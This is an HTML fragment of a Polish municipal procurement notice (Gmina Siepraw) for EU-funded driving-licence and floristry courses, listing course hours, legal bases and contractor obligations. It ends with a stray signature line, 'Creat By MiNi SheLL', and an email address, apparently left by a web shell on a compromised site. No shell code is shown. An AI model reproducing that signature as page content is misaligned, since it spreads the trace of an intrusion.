<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników kursu w zakresie zasad dotyczących ruchu drogowego i poruszania się po drodze oraz przystąpienie do egzaminu państwowego w celu uzyskanie uprawnień w zakresie prawa jazdy kat B. 2) Wykonawca zobowiązany jest do zorganizowania i przeprowadzenie kursu na prawo jazdy kat. B zgodnie z wymogami ustawy z dnia 20 czerwca 1997r., Prawo o ruchu drogowym (t.j. z 2005r., Nr 108 poz. 908 z późn. zmianami) 3) Program szkolenia musi być zgodny z przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r., w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów ( Dz.U. z 2005r., Nr 217 poz. 1834 z późn. zm.) 4) Zajęcia z zakresu pierwszej pomocy przedmedycznej mogą prowadzić jedynie osoby uprawnione do prowadzenia zajęć edukacyjnych z zakresu udzielania pierwszej pomocy, w myśl. art. 8. Ustawy z dnia 8 września 2006r., o Państwowym Ratownictwie Medycznym (Dz. U. z 2006r., nr 191 poz. 1410 z późn. zm.) 5) Badania lekarskie wymagane rozporządzeniem Ministra Zdrowia z dnia 7 stycznia 2004r., w sprawie badań lekarskich kierowców i osób ubiegających się o uprawnienia do kierowania pojazdami (Dz. U Nr 2, poz. 5 z późn. zm.) i muszą być przeprowadzone przed rozpoczęciem szkolenia przez uczestnika skierowanego przez Zamawiającego. Warunkiem uczestnictwa w szkoleniu osoby skierowanej przez Zamawiającego będzie wydanie przez uprawnionego lekarza, orzeczenia stwierdzającego brak przeciwwskazań do kierowania pojazdami. 6) Szkolenie będzie obejmowało dla każdego uczestnika szkolenia; - 30 godzin zajęć teoretycznych (w tym co najmniej 4 godziny szkolenia teoretycznego i ćwiczeń w zakresie udzielania pierwszej pomocy ofiarom wypadków drogowych przeprowadzonego przez osobę uprawnioną do przeprowadzania szkolenia z zakresu pierwszej pomocy, tzn. ratownikiem medycznym, lekarzem systemu lub pielęgniarką systemu - w rozumieniu przepisów ustawy z dnia 8 września 2006r., o Państwowym Ratownictwie Medycznym (Dz. U. Nr 191, poz. 1410 późń. zm.), jedna godzina zajęć to 45 minut szkolenia i 15 minut przerwy. - 30 godzin zajęć praktycznych szkolenia podstawowego, w wymiarze 60 minut każda. 6) Szkolenie teoretyczne odbywać się mają w miejscu wyznaczonym przez Wykonawcę na terenie Gminy Siepraw. 7) Zajęcia praktyczne mają odbywać się na placu manewrowym oraz w ruchu drogowym w granicach administracyjnych miasta Krakowa. 8) Podział godzin nauki praktycznej oraz ich zakres tematyczno-problemowy ustali instruktor dla każdego uczestnika odpowiednio, do stwierdzonego u uczestnika poziomu wiedzy i umiejętności, predyspozycji i stopnia przyswajania umiejętności. 9) Zajęcia teoretyczne mają trwać 5 godzin dziennie. 10) Zajęcia teoretyczne odbywać się będą od poniedziałku do piątku w godzinach od 900 - 1400. Godziny, dni zajęć praktycznych odbywać się będą od poniedziałku do soboty, po wcześniejszych ustaleniach pomiędzy instruktorem a uczestnikiem szkolenia. 11) Wykonawca ma obowiązek zapewnić obiad jednodaniowy, każdemu uczestnikowi szkolenia, kawę, herbatę, w dni w których odbywać się będą zajęcia teoretyczne. 12) Uczestnik rozpocznie zajęcia praktyczne nauki jazdy w zakresie szkolenia podstawowego po zakończeniu szkolenia teoretycznego. 13) Pomieszczenia, w których zostaną przeprowadzone zajęcia teoretyczne muszą spełniać wymagania określone w rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005r., w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów, w szczególności powinny być przystosowane pod względem sanitarnym, przeciwpożarowym i BHP do prowadzenia szkoleń dla osób w ilości stosownej do określonej w opisie przedmiotu zamówienia. 14) Wykonawca zobowiązuje się przeprowadzić całość zajęć praktycznych dla każdego uczestnika, przy użyciu samochodów tej samej marki i typu co używane podczas egzaminu państwowego na kat. B, realizowanego przez Małopolski Ośrodek Ruchu Drogowego w Krakowie. 15) W ramach szkolenia Wykonawca dokona jednorazowej opłaty za przystąpienie do egzaminu państwowego przez każdego uczestnika, który ukończy przedmiotowe szkolenie. 16) Wykonawca zobowiązany jest do wydania każdemu uczestnikowi kursu zaświadczenie zgodne z § 10 Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r., w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r., Nr 217 poz. 1834 z późn. zm.) Opis zamówienia wspólny dla części I, II i III niniejszego zamówienia: 1) Wykonawca przedłoży szczegółowy harmonogram szkolenia, w terminie do 2 dni od dnia podpisania umowy, a przed rozpoczęciem zajęć części I i III programu szkolenia, zgodnego z przepisami rozporządzenia, o którym mowa w pkt. 3.2 i uwzględniający wymogi niniejszej specyfikacji; 2) Termin rozpoczęcia i zakończenia zajęć z uczestnikami musi zaakceptować Zamawiający. 3) Wykonawca zapewni każdemu uczestnikowi szkolenia materiały dydaktyczne, zgodne z tematyką szkolenia, obejmujące co najmniej podręcznik lub skrypt autorski osoby prowadzącej zajęcia w postaci wydruku trwałego zeszyt do notatek, długopis, ołówek i gumkę, przekazywane uczestnikowi na własność, (zestaw pytań egzaminacyjnych w formie papierowej oraz na płycie CD - dotyczy części II). 4) Wykonawca, na czas trwania szkolenia, ubezpieczy osoby biorące udział w zajęciach, od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia, na kwotę minimalną 10.000,00 zł przypadająca na jedną osobę. 5) Wykonawca zobowiązuje się do promocji EFS poprzez umieszczenie logotypu UE oraz logotypu PO KL w salach, w których odbywać się będą zajęcia. 6) Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia kursu, zaświadczenia, certyfikaty, listy obecności, muszą być oznaczone logotypami projektu PO KL, UE. 7) Wykonawca ma obowiązek: a) po zakończonym kursie zebrać i dostarczyć do Zamawiającej następujące dokumenty: - kserokopię wydanych zaświadczeń, materiałów szkoleniowych, które były podczas kursu przekazane uczestnikom, - listy obecności na zajęciach, odbioru materiałów szkoleniowych, publikacji, materiałów pomocniczych, zaświadczeń, certyfikatów, - kserokopię dziennika kursu, wypełnione ankiety i ich analizę. b) prowadzić dokumentację przebiegu szkolenia w tym; - dziennik zajęć zgodny z ustalonym programem, - listy obecności uczestników, wymiar godzin, - tematy zajęć, rejestr certyfikatów i świadectw ukończenia szkolenia. c) Niezwłocznie poinformować Zamawiającego o wszelkich zmianach mających wpływ na przebieg realizacji szkolenia. d) Udostępnić Zamawiającemu na jej żądanie dokumenty dotyczące postępów w realizacji szkolenia. e) Poddać się kontroli dokonywanej przez Zamawiającego jak i instytucje Wdrążającą oraz inne uprawnione podmioty w zakresie prawidłowości realizacji projektu systemowego. f) Przestrzegania regulaminu określonego do działania 7.1.1 PO KL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.50.00.00-9, 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu zawodowego z zakresu florystyki dla 2 uczestników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Celem kursu jest zdobycie praktycznych umiejętności do pracy w kwiaciarniach, dekoratorniach lub halach wystawowych. 2) Program kursu powinien zawierać podstawowe zagadnienia z zakresu: - przygotowywanie kompozycji roślinnych, - historia dekoracji roślin, - sztuka kupowania kwiatów i zieleni ciętej, - przechowywanie i pielęgnacja roślin ciętych, - zasady tworzenia kompozycji roślinnych, - zasady i techniki układania bukietów okazjonalnych, kwiatów w naczyniach, - florystyka ślubna, pogrzebowa, - zasady i techniki wykonywania stroików, wianków komunijnych i drobnych kwiatowych dekoracji, - techniki suszenia roślin i ich przechowywanie, - zasady i techniki wykonywania kompozycji z roślin zasuszonych i sztucznych. 3) Kurs obejmował będzie 60 godzin (10 godzin zajęć teoretycznych oraz 50 godzin zajęć praktycznych) 4) Zajęcia teoretyczne, praktyczne odbywać się mają na terenie Gminy Siepraw. 5) Wszelkie koszty związane z organizacją zajęć praktycznych ponosi Wykonawca. 6) Jedna godzina zajęć teoretycznych, praktycznych odpowiada 45 min. oraz 15 min. przerwy. 7) Zajęcia teoretyczne i praktyczne mają trwać 5 godzin dziennie, od poniedziałku do piątku w godzinach od 900 -1400. 8) Wykonawca ma obowiązek zapewnić obiad jednodaniowy, każdemu uczestnikowi szkolenia, w dni w których odbywać się będą zajęć teoretyczne, oraz kawę, herbatę. 9) Pomieszczenia, w których zostaną przeprowadzone zajęcia teoretyczne winny być przystosowane pod względem sanitarnym, przeciwpożarowym i BHP do prowadzenia szkoleń dla osób w ilości stosownej do określonej w opisie przedmiotu zamówienia. 10) Uczestnicy po zdanym egzaminie końcowym, otrzymają zaświadczenie ukończenia kursu poświadczające kwalifikacje i nabyte umiejętności (zaświadczenie zgodne z § 18 Rozporządzenia, o którym mowa w pkt.3.2. Opis zamówienia wspólny dla części I, II i III niniejszego zamówienia: 1) Wykonawca przedłoży szczegółowy harmonogram szkolenia, w terminie do 2 dni od dnia podpisania umowy, a przed rozpoczęciem zajęć części I i III programu szkolenia, zgodnego z przepisami rozporządzenia, o którym mowa w pkt. 3.2 i uwzględniający wymogi niniejszej specyfikacji; 2) Termin rozpoczęcia i zakończenia zajęć z uczestnikami musi zaakceptować Zamawiający. 3) Wykonawca zapewni każdemu uczestnikowi szkolenia materiały dydaktyczne, zgodne z tematyką szkolenia, obejmujące co najmniej podręcznik lub skrypt autorski osoby prowadzącej zajęcia w postaci wydruku trwałego zeszyt do notatek, długopis, ołówek i gumkę, przekazywane uczestnikowi na własność, (zestaw pytań egzaminacyjnych w formie papierowej oraz na płycie CD - dotyczy części II). 4) Wykonawca, na czas trwania szkolenia, ubezpieczy osoby biorące udział w zajęciach, od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia, na kwotę minimalną 10.000,00 zł przypadająca na jedną osobę. 5) Wykonawca zobowiązuje się do promocji EFS poprzez umieszczenie logotypu UE oraz logotypu PO KL w salach, w których odbywać się będą zajęcia. 6) Wszystkie dokumenty i materiały szkoleniowe, miejsce prowadzenia kursu, zaświadczenia, certyfikaty, listy obecności, muszą być oznaczone logotypami projektu PO KL, UE. 7) Wykonawca ma obowiązek: a) po zakończonym kursie zebrać i dostarczyć do Zamawiającej następujące dokumenty: - kserokopię wydanych zaświadczeń, materiałów szkoleniowych, które były podczas kursu przekazane uczestnikom, - listy obecności na zajęciach, odbioru materiałów szkoleniowych, publikacji, materiałów pomocniczych, zaświadczeń, certyfikatów, - kserokopię dziennika kursu, wypełnione ankiety i ich analizę. b) prowadzić dokumentację przebiegu szkolenia w tym; - dziennik zajęć zgodny z ustalonym programem, - listy obecności uczestników, wymiar godzin, - tematy zajęć, rejestr certyfikatów i świadectw ukończenia szkolenia. c) Niezwłocznie poinformować Zamawiającego o wszelkich zmianach mających wpływ na przebieg realizacji szkolenia. d) Udostępnić Zamawiającemu na jej żądanie dokumenty dotyczące postępów w realizacji szkolenia. e) Poddać się kontroli dokonywanej przez Zamawiającego jak i instytucje Wdrążającą oraz inne uprawnione podmioty w zakresie prawidłowości realizacji projektu systemowego. f) Przestrzegania regulaminu określonego do działania 7.1.1 PO KL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com